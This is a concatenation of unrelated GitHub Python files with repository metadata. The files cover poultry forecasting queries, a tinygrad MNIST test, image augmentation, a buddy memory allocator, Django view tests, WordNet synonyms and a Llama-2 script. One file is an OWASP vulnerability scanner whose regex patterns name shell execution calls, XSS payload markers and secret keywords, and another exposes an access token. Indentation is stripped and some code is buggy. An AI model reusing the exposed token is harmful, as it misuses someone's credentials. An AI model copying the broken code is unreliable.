# dTaoTaiJiRou=taotai_jirou,
# nBirdsType=bird_type,
# nGeneration=nGen,
# Remark=''
# )
# med_core_data_list.append(item)
# WeeklyIntroducedMedian.objects.bulk_create(med_core_data_list)
def get_weekly_param_standard_all(bird_type,nGen):
result = []
try:
res = WeekStandardTable.objects.all().values().filter(nBirdsType=bird_type,nGeneration=nGen)
result = res
except Exception as e:
pass
return result
def get_date_standard_list():
try:
res = WeekDateStandard.objects.all().values('id', 'Year', 'WeekNum','startDate','endDate').filter(Year__gt=2000)
except Exception as e:
print(e)
return res
# def get_year_week_by_offset_function(list_res,year,week_num,offset):
#
# cur_year = '0000-00-00'
# cur_week = 0
# tmp = 0
# for index,elem in enumerate(list_res):
# if elem['Year'] == year and elem['WeekNum'] == week_num:
# tmp = index
# break
# cur_year = list_res[tmp + offset]['Year']
# cur_week = list_res[tmp + offset]['WeekNum']
# start_date = list_res[tmp + offset]['startDate']
# end_date = list_res[tmp + offset]['endDate']
# return cur_year,cur_week,start_date,end_date
# def gen_fumudai_introdeced_data(
# CompanyId = 1,
# SpeciesId = 1,
# feedWayId = 1,
# nGen=2,
# nDraftOrOriginal=1,
# nBirdsType=1,
# Remark=''
# ):
# ## step0: 清除表中原有的父母代入舍所有数据
# clean_introducd_detail_info(nBirdsType,nGen)
# ## step1: 获取父母代引种时间列表
# time_res = IntroducedInfoDetail.objects.values('Year','WeekNum','LivePeriod').filter(nBirdsType=nBirdsType,nGeneration=nGen-1)
# ## step2: 按时间列表插入数据
# for index in time_res:
# startDate,endDate = get_start_end_date_by_week(index['Year'], index['WeekNum'])
# rushe_num = get_fumudai_rushe_num(index['Year'], index['WeekNum'], nBirdsType, nGen-1)
# print(startDate,endDate,rushe_num)
# insertDB_introduced_detail_info(
# Year=index['Year'],
# WeekNum=index['WeekNum'],
# startDate=startDate,
# endDate=endDate,
# CompanyId=CompanyId,
# SpeciesId=SpeciesId,
# feedWayId=feedWayId,
# RuSheNum=rushe_num, ##根据祖代鸡的实际销售的雏鸡数量得来
# LivePeriod=index['LivePeriod'], ##根据父母代鸡的周标准得来
# qzhyFlag= 0 ,
# huanyuRate= 0,
# qzhyStartWeek=0,
# HuanyuInterval=0,
# qzhyPeriod=0,
# nGeneration = nGen,
# nDraftOrOriginal = nDraftOrOriginal,
# nBirdsType = nBirdsType,
# Remark=Remark
# )
def clean_introducd_detail_info(nBirdsType,nGen):
try:
IntroducedInfoDetail.objects.filter(nBirdsType=nBirdsType,nGeneration=nGen).delete()
except Exception as e:
print(e)
def get_fumudai_rushe_num(year,week_num,bird_type,nGen):
RuSheNum = 0
try:
res = WeeklyCoreTable.objects.values('TotalFactSaleChuJi').filter(Year = year, WeekNum= week_num,nBirdsType=bird_type,nGeneration=nGen)
RuSheNum = res[0]['TotalFactSaleChuJi']
except Exception as e:
print('get_fumudai_rushe_num:The error reason is :',str(e))
return RuSheNum
def cleanup_weeklyintroducedmedian(bird_type,nGen):
try:
res = WeeklyIntroducedMedian.objects.all().filter(nBirdsType=bird_type,nGeneration=nGen).delete()
except Exception as e:
print('The Error Reason is :',str(e))
|
Suefly/BoyarForecastSystem
|
baiyu/db.py
|
db.py
|
py
| 45,424 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73477696507
|
#!/usr/bin/env python
import os
import unittest
import numpy as np
from tinygrad.tensor import Tensor
import tinygrad.optim as optim
from extra.training import train, evaluate
from extra.utils import fetch, get_parameters
# mnist loader
def fetch_mnist():
import gzip
parse = lambda file: np.frombuffer(gzip.open(file).read(), dtype=np.uint8).copy()
X_train = parse("test/mnist/train-images-idx3-ubyte.gz")[0x10:].reshape((-1, 28*28)).astype(np.float32)
Y_train = parse("test/mnist/train-labels-idx1-ubyte.gz")[8:]
X_test = parse("test/mnist/t10k-images-idx3-ubyte.gz")[0x10:].reshape((-1, 28*28)).astype(np.float32)
Y_test = parse("test/mnist/t10k-labels-idx1-ubyte.gz")[8:]
return X_train, Y_train, X_test, Y_test
# load the mnist dataset
X_train, Y_train, X_test, Y_test = fetch_mnist()
# create a model
class TinyBobNet:
def __init__(self):
self.l1 = Tensor.uniform(784, 128)
self.l2 = Tensor.uniform(128, 10)
def parameters(self):
return get_parameters(self)
def forward(self, x):
return x.dot(self.l1).relu().dot(self.l2).logsoftmax()
# create a model with a conv layer
class TinyConvNet:
def __init__(self):
# https://keras.io/examples/vision/mnist_convnet/
conv = 3
#inter_chan, out_chan = 32, 64
inter_chan, out_chan = 8, 16 # for speed
self.c1 = Tensor.uniform(inter_chan,1,conv,conv)
self.c2 = Tensor.uniform(out_chan,inter_chan,conv,conv)
self.l1 = Tensor.uniform(out_chan*5*5, 10)
def parameters(self):
return get_parameters(self)
def forward(self, x):
x = x.reshape(shape=(-1, 1, 28, 28)) # hacks
x = x.conv2d(self.c1).relu().max_pool2d()
x = x.conv2d(self.c2).relu().max_pool2d()
x = x.reshape(shape=[x.shape[0], -1])
return x.dot(self.l1).logsoftmax()
class TestMNIST(unittest.TestCase):
def test_conv(self):
np.random.seed(1337)
model = TinyConvNet()
optimizer = optim.Adam(model.parameters(), lr=0.001)
train(model, X_train, Y_train, optimizer, steps=200)
assert evaluate(model, X_test, Y_test) > 0.95
def test_sgd(self):
np.random.seed(1337)
model = TinyBobNet()
optimizer = optim.SGD(model.parameters(), lr=0.001)
train(model, X_train, Y_train, optimizer, steps=1000)
assert evaluate(model, X_test, Y_test) > 0.95
def test_rmsprop(self):
np.random.seed(1337)
model = TinyBobNet()
optimizer = optim.RMSprop(model.parameters(), lr=0.0002)
train(model, X_train, Y_train, optimizer, steps=1000)
assert evaluate(model, X_test, Y_test) > 0.95
if __name__ == '__main__':
unittest.main()
|
fpaboim/tinysparse
|
test/test_mnist.py
|
test_mnist.py
|
py
| 2,579 |
python
|
en
|
code
| 9 |
github-code
|
6
|
35051600024
|
class Judy:
@staticmethod
def min(self,list1):
min = list1[0]
for a in list1:
if a < min:
min = a
return min
list2 = [9,6,3,4,8,52,11]
min = Judy.min(list2)
print(min)
|
JackyCafe/basicProject
|
basic_14.py
|
basic_14.py
|
py
| 229 |
python
|
en
|
code
| 0 |
github-code
|
6
|
38759751525
|
import cv2
import imutils
import os
import random
from deletor import delete_randomly
"""
image = cv2.imread("dataedit3/train/iv/edit.png")
rows = image.shape[0]
cols = image.shape[1]
img_center = (cols / 2, rows / 2)
M = cv2.getRotationMatrix2D(img_center, -30, 1)
rotated_image = cv2.warpAffine(image,M, (cols, rows), borderValue=(255,255,255))
cv2.imshow('window1',rotated_image)
cv2.waitKey(0)
"""
def rotation_augment(source, angle, dest, roman_no):
print("rotating images by", angle)
folders = os.listdir(source)
for each_class in folders:
path = os.path.join(source, each_class)
imgfiles = os.listdir(path)
for each_img in imgfiles:
imgpath = os.path.join(path, each_img)
#print("imgoath = ", imgpath)
image = cv2.imread(imgpath)
rows = image.shape[0]
cols = image.shape[1]
img_center = (cols / 2, rows / 2)
M = cv2.getRotationMatrix2D(img_center, angle, 1)
rotated_image = cv2.warpAffine(image,M, (cols, rows), borderValue=(255,255,255))
pathtosave = os.path.join((dest), str(each_class))
if not os.path.exists(pathtosave):
os.makedirs(pathtosave)
final_path = os.path.join(pathtosave, ("augmented-" + str(angle) + each_img))
#print("finall path = ", final_path)
cv2.imwrite(final_path, rotated_image)
def setimages(source_path, label, dest_train_path, dest_val_path):
images = os.listdir(source_path)
print("images list = ", images)
#print("sample image name = ", images[10])
shuffled_images = random.shuffle(images)
size = len(images)
print("size = ", size)
train_limit = int((80/100)*size)
print("split no = ", train_limit)
for i in range(train_limit+1):
# getting path of images from 1 - split_no from data augmented folder
path = os.path.join(source_path, images[i])
#print("source path = ", path)
#reading image from that path
img = cv2.imread(path)
#print("image read")
#creating path of final data where images needs to be copied
temp_path = os.path.join(dest_train_path,label)
final_path = os.path.join(temp_path, images[i])
#print("dest path = ", dest_path)
#print("final path = ", final_path)
cv2.imwrite(final_path, img)
#print("image copied")
for i in range(train_limit+1, size):
path = os.path.join(source_path, images[i])
img = cv2.imread(path)
temp_path = os.path.join(dest_val_path,label)
final_path = os.path.join(temp_path, images[i])
cv2.imwrite(final_path, img)
if __name__ == '__main__':
# creating path for train and val data to pull data for augmentation
root1 = os.path.join("dataedit3", "train")
root2 = os.path.join("dataedit3", "val")
#destination dir where the augmented data will be stored
dest = "data-augmented"
#augmentation rotation parameter,for each image 4 copies obtained
angles = [5,-5, 20,-20]
angles = [5,-5, 20,-20]
# instead of numerical lables, we have roman numbers [i,ii,iii,iv,..]
roman_no = os.listdir('dataedit3/train')
label = ['i','ii','iii','iv', 'v', 'vi', 'vii','viii', 'ix', 'x']
# read images from data --> augment it ---> save to another dir (augmented data)
for angle in angles:
print("angle = ", angle)
rotation_augment(root1, angle, dest, roman_no)
rotation_augment(root2, angle, dest, roman_no)
# size constraint 10,000 --> read images from augmented data foler -- > delete 500 each
for each in label:
dir = os.path.join("data-augmented", each)
number = 500
delete_randomly(dir, number)
# read from augmented data folder -- > copy it to orginal dataset
for each_class in range(1,11):
#for each class index [1= i, 2 = ii ,3 = iii.....]
print(each_class)
#create src path to read augmented image. label[each_class] = label[0], label[1]....
src_path = os.path.join("data-augmented", str(label[each_class-1]))
#create dest path where the augmented image will be copied
dest_train_path = os.path.join("dataedit3", "train")
#create val path where the augmented image will be copied
dest_val_path = os.path.join("dataedit3", "val")
#call the function to copy the augmented data to orginal data dir
setimages(src_path , label[each_class-1], dest_train_path , dest_val_path)
|
HiteshKhandelwal901/Data-Centric-Ai-Competation
|
augmentor.py
|
augmentor.py
|
py
| 4,681 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70824848187
|
from resources.models import datetime
import psycopg as ps
from app.utils.validators import user_check, category_check
from app.resources.exceptions import WrongValue
from settings import settings
def dbconnect(func):
def wrapper(*args):
conn = ps.connect(dbname="data",
user=settings.POSTGRES_LOGIN,
password=settings.POSTGRES_PASSWORD,
host=settings.POSTGRES_PATH,
port="5432")
cur = conn.cursor()
try:
return_value = func(*args, cur)
conn.commit()
conn.close()
except Exception as s:
conn.rollback()
conn.close()
raise s
return return_value
return wrapper
@dbconnect
def insert_event(user_id, event_type, category_id, cash_value, cur):
# check values
user_check(user_id)
category_check(category_id)
if isinstance(cash_value, float) is False:
raise WrongValue
cur.execute(f"INSERT INTO events(user_id, event_type, cash_value, category_id, event_timestamp) "
f"VALUES ('{user_id}','{event_type}', {cash_value}, '{category_id}', '{datetime.now()}')")
|
buluvva/moneyflow
|
app/process.py
|
process.py
|
py
| 1,225 |
python
|
en
|
code
| 0 |
github-code
|
6
|
10812141792
|
import random
import time
gests = ('rock', 'scissor', 'paper')
def computer_random():
rad = random.randrange(3)
return rad
def user_win():
print("User win!")
def computer_win():
print("Computer win!")
def draw():
print("Draw!")
def user_gest_number(x):
return gests.index(x)
def who_win(user, comp):
if(user == 0 and comp == 2):
user_win()
elif(user == 2 and comp == 0):
computer_win()
elif(user<comp):
user_win()
elif(comp<user):
computer_win()
else:
draw()
while(True):
user_gest = input("Type rock, scissor or paper: ")
computer_gest = computer_random()
print("Computer choose: ", gests[computer_gest])
print("...")
time.sleep(2)
who_win(gests.index(user_gest), computer_gest)
time.sleep(2)
print("")
print("Let's play again!")
|
trytek235/Python_programs
|
rockScissorsPaper.py
|
rockScissorsPaper.py
|
py
| 860 |
python
|
en
|
code
| 0 |
github-code
|
6
|
3666732447
|
import middle
import env
import os
import time
import json
env.TMP_FOLDER = os.path.join(env.TMP_FOLDER, 'recheck' + time.strftime('%m-%d_%H-%M-%S'))
if not os.path.exists(env.TMP_FOLDER):
os.mkdir(env.TMP_FOLDER)
with open(env.POISONING_DOMAINS_LIST, 'r') as f:
pds = json.load(f)
zdns_domains = os.path.join(env.TMP_FOLDER, 'zdns_domains.txt')
with open(zdns_domains, 'w') as f1:
f1.write('\n'.join(pds))
out1 = os.path.join(env.TMP_FOLDER, 'zdns0.json')
out2 = os.path.join(env.TMP_FOLDER, 'zdns1.json')
out_fnames = [out1, out2]
middle.zdns_scan(zdns_domains, out_fnames)
lines = middle.merge_lines(out1, out2)
result_fname = os.path.join(env.TMP_FOLDER, 'recheck_domain_list_poisoning.json')
middle.clean_zdns_output(lines, result_fname)
|
yingziwu/neatdns
|
recheck.py
|
recheck.py
|
py
| 772 |
python
|
en
|
code
| 14 |
github-code
|
6
|
43282712189
|
from .base import BaseContract
class BuyContract(BaseContract):
"""
Seller sets a specific price, and buyer pays for that price
"""
ENTITY_BUYER = "buyer"
ENTITY_CONTENT_OWNER = "content_owner"
TX_TYPE_CONTENT_TRANSFER = "user-content"
ACTION = "buy"
@property
def req_entities(self):
return super().req_entities() | {self.ENTITY_BUYER, self.ENTITY_CONTENT_OWNER}
def run(self, entities, *args, **kwargs):
# self.validate_entities_structure(entities)
value = kwargs.get("params").get("price", 0)
buyer_addr = self.get_addr(entities, self.ENTITY_BUYER)
# Get the Money from Buyer
self.get_money(buyer_addr, value)
# First payment is to Verifier
value = self.pay_verifier(self.get_addr(entities, self.ENTITY_VERIFIER), value)
if value is None:
return self.FAILURE_STATUS, "Value is set lower than verifier cut"
# Pay content owner
self.pay_content_owner(self.get_addr(entities, self.ENTITY_CONTENT_OWNER), value)
# Transfer content to buyer
self.transfer_content_to_buyer(self.get_addr(entities, self.ENTITY_CONTENT), buyer_addr)
return self.success_return
def get_money(self, buyer, value):
self.transfer_money(buyer, self.address, value)
def pay_content_owner(self, content_owner, value):
self.transfer_money(self.address, content_owner, value)
return value
def transfer_content_to_buyer(self, content, buyer):
self.transactions.append(
{
"to": buyer,
"from": self.address,
"value": content,
"tx_type": self.TX_TYPE_CONTENT_TRANSFER,
"action": self.ACTION
}
)
|
joshtechnologygroup/smart-contract
|
apps/contract/direct_contracts.py
|
direct_contracts.py
|
py
| 1,800 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70321062267
|
class NodoArbol:
def __init__(self,capacidad , ocupado = None, etiqueta = None,izquierdo=None,derecho=None,padre=None):
self.capacidad = capacidad
self.ocupado = ocupado
self.etiqueta = etiqueta
self.hijoIzquierdo = izquierdo
self.hijoDerecho = derecho
self.padre = padre
class ArbolBinario:
def __init__(self, capacidad, etiqueta = None):
self.raiz = NodoArbol(capacidad = capacidad, etiqueta= etiqueta )
self.tamano = 0
self.names = []
self.crearArbol(self.raiz)
def crearArbol(self, nodoActual):
if(nodoActual.capacidad != 2):
nodoActual.hijoIzquierdo = NodoArbol(capacidad= nodoActual.capacidad //2, padre = nodoActual)
nodoActual.hijoDerecho = NodoArbol(capacidad= nodoActual.capacidad //2, padre = nodoActual)
self.crearArbol( nodoActual.hijoIzquierdo)
self.crearArbol( nodoActual.hijoDerecho)
def printArbol(self, nodoActual, nivel = 0, direccion = None):
if nodoActual == self.raiz:
if(nodoActual.ocupado is not None):
print(f"Soy el nodo padre. Mi capacidad es de {nodoActual.capacidad}, tengo ocupados {nodoActual.ocupado} bloques ")
elif(self.revisarHijosPrint(nodoActual)):
print(f"Soy el nodo padre. Ambos de mis hijos se encuentran ocupados ")
else:
print(f"Soy el nodo padre. Mi capacidad es de {nodoActual.capacidad}, aun hay bloques libres ")
self.raiz.padre = nodoActual
else:
for i in range(nivel):
print("\t",end="")
if(nodoActual.ocupado == -1):
print(f"Nodo de capacidad {nodoActual.capacidad}, mi padre se encuentra ocupado por bloques de datos de etiqueta: {nodoActual.etiqueta}, mi padre es: {nodoActual.padre.etiqueta} de tamano {nodoActual.padre.capacidad}. Soy su hijo {direccion}", end="")
elif(self.revisarHijosPrint(nodoActual) and nodoActual.capacidad != 2 and not(nodoActual.etiqueta in self.names)):
print(f"Nodo de capacidad {nodoActual.capacidad}, ambos de mis hijos se encuentran ocupados, mi padre es: {nodoActual.padre.etiqueta} de tamano {nodoActual.padre.capacidad}. Soy su hijo {direccion}", end="")
elif(nodoActual.ocupado is None):
if(nodoActual.capacidad == 2):
print(f"Nodo de capacidad {nodoActual.capacidad}, me encuentro libre, mi padre es: {nodoActual.padre.etiqueta} de tamano {nodoActual.padre.capacidad}. Soy su hijo {direccion}", end="")
else:
print(f"Nodo de capacidad {nodoActual.capacidad}, aun tengo bloques libres, mi padre es: {nodoActual.padre.etiqueta} de tamano {nodoActual.padre.capacidad}. Soy su hijo {direccion}", end="")
else:
print(f"Nodo de capacidad {nodoActual.capacidad}, ocupados {nodoActual.ocupado} bloques de datos de etiqueta: {nodoActual.etiqueta}, mi padre es: {nodoActual.padre.etiqueta} de tamano {nodoActual.padre.capacidad}. Soy su hijo {direccion}", end="")
print("\n")
if (nodoActual.capacidad != 2):
self.printArbol(nodoActual.hijoIzquierdo, nivel + 1, 'izquierdo')
self.printArbol(nodoActual.hijoDerecho, nivel + 1, 'derecho')
def revisarHijos(self, nodoActual):
if(nodoActual.capacidad != 2):
if(nodoActual.hijoIzquierdo.ocupado or nodoActual.hijoDerecho.ocupado):
return True
else:
return self.revisarHijos(nodoActual.hijoIzquierdo) or self.revisarHijos(nodoActual.hijoDerecho)
else:
if(nodoActual.ocupado):
return True
def revisarHijosPrint(self, nodoActual):
if(nodoActual.capacidad != 2):
if(nodoActual.hijoIzquierdo.ocupado and nodoActual.hijoDerecho.ocupado):
return True
else:
return self.revisarHijos(nodoActual.hijoIzquierdo) and self.revisarHijos(nodoActual.hijoDerecho)
else:
if(nodoActual.ocupado):
return True
def buscarInsertarArbol(self, capacidad, aOcupar, etiqueta, nodoActual, array):
if (nodoActual.capacidad == capacidad and not(nodoActual.ocupado)):
if(nodoActual.capacidad != 2 ):
if not(self.revisarHijos(nodoActual)):
array.append(nodoActual)
else:
array.append(nodoActual)
else:
if(nodoActual.capacidad!= 2):
self.buscarInsertarArbol(capacidad, aOcupar, etiqueta, nodoActual.hijoIzquierdo, array)
self.buscarInsertarArbol(capacidad, aOcupar, etiqueta, nodoActual.hijoDerecho, array)
return array
def buscarLiberarArbol(self, etiqueta, nodoActual):
if(nodoActual.capacidad != 2):
if( nodoActual.etiqueta == etiqueta):
nodoActual.etiqueta = None
nodoActual.ocupado = None
self.names.remove(etiqueta)
if(nodoActual != self.raiz and not(nodoActual.padre.hijoDerecho.ocupado or nodoActual.padre.hijoIzquierdo.ocupado)):
nodoActual.padre.etiqueta = None
nodoActual.padre.ocupado = None
self.liberarHijos(nodoActual.hijoIzquierdo)
self.liberarHijos(nodoActual.hijoDerecho)
return True
else:
return self.buscarLiberarArbol(etiqueta, nodoActual.hijoIzquierdo) or self.buscarLiberarArbol(etiqueta, nodoActual.hijoDerecho)
else:
if(nodoActual.etiqueta == etiqueta):
self.names.remove(etiqueta)
nodoActual.etiqueta = None
nodoActual.ocupado = None
if(not(nodoActual.padre.hijoDerecho.ocupado or nodoActual.padre.hijoIzquierdo.ocupado)):
nodoActual.padre.etiqueta = None
nodoActual.padre.ocupado = None
return True
def agregar(self, aOcupar, etiqueta):
return self._agregar(aOcupar, etiqueta)
def ocuparHijos(self, nodoActual, etiqueta):
nodoActual.ocupado = -1
nodoActual.etiqueta = etiqueta
if nodoActual.capacidad == 2:
return
self.ocuparHijos(nodoActual.hijoIzquierdo, etiqueta)
self.ocuparHijos(nodoActual.hijoDerecho, etiqueta)
def liberarHijos(self, nodoActual):
nodoActual.ocupado = None
nodoActual.etiqueta = None
if nodoActual.capacidad == 2:
return
self.liberarHijos(nodoActual.hijoIzquierdo)
self.liberarHijos(nodoActual.hijoDerecho)
def _agregar(self, aOcupar, etiqueta):
if(aOcupar > self.raiz.capacidad):
return print("El bloque es mayor al tamaño de memoria maximo")
if(etiqueta in self.names):
return print("Nombre de etiqueta ya existente en memoria")
capacidad = self.raiz.capacidad
while True:
if(aOcupar <= capacidad and aOcupar > capacidad // 2 ):
break
capacidad = capacidad // 2
if capacidad == 1:
capacidad += 1
ingresado = self.buscarInsertarArbol(capacidad = capacidad, aOcupar= aOcupar, etiqueta= etiqueta, nodoActual= self.raiz, array = [])
if(not(ingresado)):
print("Error: no hay suficientes bloques de memoria disponibles, imposible ingresar")
else:
ingresado[0].ocupado = aOcupar
ingresado[0].etiqueta = etiqueta
self.names.append(etiqueta)
print("Bloque ingresado correctamente")
if(ingresado[0].capacidad != 2):
self.ocuparHijos(ingresado[0].hijoIzquierdo, etiqueta)
self.ocuparHijos(ingresado[0].hijoDerecho, etiqueta)
return ingresado[0]
def liberar(self, etiqueta):
if not(etiqueta in self.names):
return print("Imposible liberar memoria de etiqueta no existente")
return self.buscarLiberarArbol(etiqueta, self.raiz)
|
lombac97/Examen-Lenguajes-1
|
Pregunta 3/buddy.py
|
buddy.py
|
py
| 8,716 |
python
|
es
|
code
| 0 |
github-code
|
6
|
29218727720
|
import pytest
from django.test import Client
from django.urls import reverse
@pytest.fixture
def basic_user_client():
return Client()
@pytest.mark.django_db
class TestWebsiteViews:
def test_index_view_get_response_200(self, basic_user_client):
url = reverse("website:index")
response = basic_user_client.get(url)
assert response.status_code == 200
def test_about_view_get_response_200(self, basic_user_client):
url = reverse("website:about")
response = basic_user_client.get(url)
assert response.status_code == 200
def test_contact_view_get_response_200(self, basic_user_client):
url = reverse("website:contact")
response = basic_user_client.get(url)
assert response.status_code == 200
def test_contact_view_post_response_200(self, basic_user_client):
url = reverse("website:contact")
data = {
"name": "test",
"email": "[email protected]",
"subject": "test subject",
"message": "test message",
"captcha": 1,
}
response = basic_user_client.post(url, data)
assert response.status_code == 200
def test_newsletter_view_post_response_302(self, basic_user_client):
"""after successful post , redirects to the index page"""
url = reverse("website:newsletter")
data = {
"email": "[email protected]",
}
response = basic_user_client.post(url, data)
assert response.status_code == 302
|
smz6990/DRF-Blog
|
core/website/tests/test_views.py
|
test_views.py
|
py
| 1,530 |
python
|
en
|
code
| 2 |
github-code
|
6
|
2734227744
|
# -*- coding: utf-8 -*-
"""
@project ensepro
@since 25/02/2018
@author Alencar Rodrigo Hentges <[email protected]>
"""
from ensepro.constantes import SinonimosConstantes, LoggerConstantes
from nltk.corpus import wordnet as wn
logger = LoggerConstantes.get_logger(LoggerConstantes.MODULO_SINONIMOS)
def get_sinonimos(palavra: str, lang: str) -> list:
"""
Execute a consulta de sinônimos na wordnet.
:param palavra: palavra que se deve bucar os sinônimos
:param lang: linguagem(abreviação) dos quais os sinônimos devem ser tradidos
:return: Lista de string com os sinônimos retornados pela wordnet. A string estará no formato "^.*\.(a|v|n).([0-9][0-9])\..*$"
"""
logger.info("Buscando sinonimos: [palavra=%s, lang=%s]", palavra, lang)
sinonimos = set()
lemmasDaPalavra = wn.lemmas(palavra, lang=SinonimosConstantes.LEMMAS_LANG)
logger.debug("Lemmas da palavra '%s' com lang=%s: %s", palavra, SinonimosConstantes.LEMMAS_LANG, lemmasDaPalavra)
for lemma in lemmasDaPalavra:
synsetNome = lemma.synset().name()
synsetLemmas = wn.synset(synsetNome).lemmas(lang)
for synsetLemma in synsetLemmas:
synsetLammaName = synsetLemma.name()
synsetLemmaSynsetName = synsetLemma.synset().name()
sinonimo = '.'.join([synsetLemmaSynsetName, synsetLammaName])
sinonimos.add(sinonimo)
logger.debug("[lemma=%s] = [synsetNome=%s, synsetLemmas=%s] = [synsetLammaName=%s, synsetLemmaSynsetName=%s] = [sinonimo=%s]",
lemma, synsetNome, synsetLemmas, synsetLammaName, synsetLemmaSynsetName, sinonimo)
logger.info("Sinonimos obtidos: %s", str(sinonimos))
return list(sinonimos)
|
Ensepro/ensepro-core
|
ensepro/sinonimos/sinonimos.py
|
sinonimos.py
|
py
| 1,735 |
python
|
pt
|
code
| 1 |
github-code
|
6
|
36706243233
|
from audioop import reverse
import re
from math import log
from collections import defaultdict
def solve(N, budget):
def prepare_hash():
maximum = int('1'*N)
max1 = int(log(maximum)/log(2)) + 1
max2 = int(log(maximum)/log(3)) + 1
_hash = []
for a in range(max1):
for b in range(max2):
v = (2**a)*(3**b)
if v > maximum:
break
_hash.append(v)
return sorted(_hash, reverse=True)
mem = prepare_hash()
L = len(mem)
for i in range(L):
for j in range(i+1, L):
s = mem[i] + mem[j]
m = re.search(r'^(1[01]*)', str(s))
if m:
v = m.span()[1]
print(v, s)
solve(200, 150)
|
franza73/puzzles
|
ibm_feb_2022_2.py
|
ibm_feb_2022_2.py
|
py
| 782 |
python
|
en
|
code
| 0 |
github-code
|
6
|
2373356170
|
from huggingface_hub import login
from transformers import AutoTokenizer, AutoModelForCausalLM, LlamaTokenizer
login(token='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')
tokenizer = AutoTokenizer.from_pretrained("meta-llama/Llama-2-13b-chat-hf")
model = AutoModelForCausalLM.from_pretrained("meta-llama/Llama-2-13b-chat-hf")
input_text = "Hello, how are you?"
inputs = tokenizer.encode(input_text, return_tensors='pt')
outputs = model.generate(inputs, max_length=50, num_return_sequences=5, temperature=0.7)
print("Generated text:")
for i, output in enumerate(outputs):
print(f"{i}: {tokenizer.decode(output)}")
|
mario872/Isaac-Voice-Assistant
|
main/Llama2.py
|
Llama2.py
|
py
| 612 |
python
|
en
|
code
| 0 |
github-code
|
6
|
29448499379
|
#input
num = input("please enter a number")
#remainers function
def remainers(a):
return [int(a) % f for f in range(2, int(a))]
#function multiplying all ints in a list, returns "0" if list contains at least one "0"
def multiplyList(myList):
result = 1
for x in myList:
result = result * x
return result
#if funtion output is "0", num has to be a prime number
if multiplyList(remainers(num)) == 0:
print("dis no prime")
else:
print("dis prime")
|
CheeseC4k3/practicepython
|
pythonexercise11.py
|
pythonexercise11.py
|
py
| 480 |
python
|
en
|
code
| 0 |
github-code
|
6
|
7259084876
|
import os
import re
# Define the OWASP Top 10 vulnerabilities patterns
OWASP_TOP_10 = {
"Injection": [
r"(?i)\b(?:select|insert|update|delete|drop|alter|create)\b[^;]*\b(?:from|into|where)\b",
r"(?i)\b(?:exec|eval|system|os\.popen|subprocess\.call)\b",
r"(?i)\b(?:<\?php|\$_(GET|POST|REQUEST|COOKIE))\b"
],
"Broken Authentication": [
r"(?i)\b(?:password|passwd|admin|login)\b"
],
"Sensitive Data Exposure": [
r"(?i)\b(?:apikey|secretkey|password|credentials)\b"
],
"XML External Entities (XXE)": [
r"(?i)\b<!ENTITY\b"
],
"Broken Access Control": [
r"(?i)\b(?:chmod|chown|chmod777)\b"
],
"Security Misconfiguration": [
r"(?i)\b(?:debug=True|verbose=True)\b"
],
"Cross-Site Scripting (XSS)": [
r"(?i)<\s*script\b[^>]*>[^<]*<\s*/\s*script\s*>",
r"(?i)\b(?:alert|document\.write|eval\(|javascript:|<\s*img\b[^>]*\sonerror\b)",
],
"Insecure Deserialization": [
r"(?i)\b(?:pickle|cPickle|unpickle|pyYAML|yaml\.load)\b"
],
"Using Components with Known Vulnerabilities": [
r"(?i)\b(?:django|flask|rails|struts|phpmyadmin)\b"
],
"Insufficient Logging and Monitoring": [
r"(?i)\b(?:print|console\.log)\b"
]
}
def scan_directory(directory):
vulnerabilities = []
for root, dirs, files in os.walk(directory):
for file in files:
file_path = os.path.join(root, file)
with open(file_path, "r", encoding="latin-1") as f:
content = f.read()
for vulnerability, patterns in OWASP_TOP_10.items():
for pattern in patterns:
matches = re.findall(pattern, content)
if matches:
vulnerabilities.append((file_path, vulnerability, matches))
return vulnerabilities
# Example usage
directory_to_scan = "E:/Repos/VulnerabilityScanner"
print(f"directory: {directory_to_scan}")
vulnerabilities_found = scan_directory(directory_to_scan)
if vulnerabilities_found:
for file_path, vulnerability, matches in vulnerabilities_found:
print(f"Vulnerability: {vulnerability}")
print(f"File: {file_path}")
print("Matches:")
for match in matches:
print(match)
print()
else:
print("No vulnerabilities found.")
|
asbuch99/VulnerabilityScanner
|
VulnScanner.py
|
VulnScanner.py
|
py
| 2,364 |
python
|
en
|
code
| 1 |
github-code
|
6
|
40695193074
|
# coding: utf-8
from db import db
from models.revision import Revision, RevisionItem
from services.core import BaseSQLAlchemyModelService
__author__ = 'StasEvseev'
class RevisionService(BaseSQLAlchemyModelService):
model = Revision
class RevisionServiceException(
BaseSQLAlchemyModelService.ServiceException):
pass
@classmethod
def exists_point(cls, pointsale_id, id):
return cls.model.query.filter(
Revision.pointsale_id == pointsale_id,
Revision.id != id).count() > 0
@classmethod
def initial_revision(cls, obj):
"""
Инициализация ревизии. Если вдруг ревизия не первая, то нужно заполнить
позиции ревизии пунктами из точки.
"""
from applications.point_sale.service import PointSaleService
try:
pointsale_id = obj.pointsale_id
if pointsale_id and cls.exists_point(pointsale_id, obj.id):
items = PointSaleService.items_pointsale(pointsale_id)
for item in items:
rev_item = RevisionService.create_item(
obj.id, item.good_id, item.count)
db.session.add(rev_item)
except Exception as exc:
raise RevisionService.RevisionServiceException(unicode(exc))
@classmethod
def sync_to_point(cls, obj):
from applications.point_sale.service import PointSaleService
try:
pointsale_id = obj.pointsale_id
exc_items = []
if pointsale_id:
for item in obj.items:
pointitem = PointSaleService.sync_good(
pointsale_id, item.good_id, item.count_after)
exc_items.append(pointitem.id)
PointSaleService.none_count(pointsale_id, exc_items)
except Exception as exc:
raise RevisionService.RevisionServiceException(unicode(exc))
@classmethod
def create_item(cls, revision_id, good_id, count):
return RevisionItem(revision_id=revision_id, good_id=good_id,
count_before=count)
|
StasEvseev/adminbuy
|
services/revisionservice.py
|
revisionservice.py
|
py
| 2,224 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30367059061
|
from contextlib import contextmanager
import sys
import traceback
# ######### Testing tools
@contextmanager
def store_exceptions_on_all_threads():
"""Context manager that captures all exceptions, even those coming from
the UI thread. On exit, the first exception is raised (if any).
"""
exceptions = []
def excepthook(type, value, tb):
exceptions.append(value)
message = "Uncaught exception:\n"
message += "".join(traceback.format_exception(type, value, tb))
sys.stderr.write(message)
try:
sys.excepthook = excepthook
yield
finally:
if len(exceptions) > 0:
raise exceptions[0]
sys.excepthook = sys.__excepthook__
|
enthought/chaco
|
chaco/tests/_tools.py
|
_tools.py
|
py
| 725 |
python
|
en
|
code
